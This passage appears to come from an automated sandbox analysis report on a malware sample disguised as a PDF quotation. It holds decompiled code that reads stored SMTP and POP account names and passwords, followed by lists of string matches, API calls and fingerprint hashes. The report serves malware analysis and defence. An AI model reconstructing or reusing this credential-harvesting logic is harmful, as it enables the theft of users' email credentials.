					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                0x0040d070
                0x0040d080
                0x0040d084
                0x0040d086
                0x0040d08c
                0x0040d0a0
                0x0040d0ae
                0x0040d0bd
                0x0040d0c0
                0x0040d0c5
                0x0040d0c9
                0x0040d0e3
                0x0040d0f2
                0x0040d101
                0x0040d104
                0x0040d109
                0x0040d110
                0x0040d11e
                0x0040d123
                0x0040d126
                0x0040d12d
                0x0040d145
                0x0040d154
                0x0040d15a
                0x0040d166
                0x0040d174
                0x0040d186
                0x0040d18e
                0x0040d19a
                0x0040d1ac
                0x0040d1ba
                0x0040d1cc
                0x0040d1d1
                0x0040d1dd
                0x0040d1e2
                0x0040d1e7
                0x0040d1e7
                0x0040d1e7
                0x0040d1eb
                0x0040d1f1
                0x0040d1f7
                0x0040d1ff
                0x0040d207
                0x0040d20f
                0x0040d217
                0x0040d21f
                0x0040d227
                0x0040d230

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                • API String ID: 0-2111798378
                • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                Download Yara Rule
                APIs
                • CoInitialize.OLE32(00000000), ref: 0040438F
                • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                • VariantInit.OLEAUT32(?), ref: 004043C4
                • SysAllocString.OLEAUT32(?), ref: 004043CD
                • VariantInit.OLEAUT32(?), ref: 00404414
                • SysAllocString.OLEAUT32(?), ref: 00404419
                • VariantInit.OLEAUT32(?), ref: 00404431
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: InitVariant$AllocString$CreateInitializeInstance
                • String ID:
                • API String ID: 1312198159-0
                • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                Uniqueness

                Uniqueness Score: -1.00%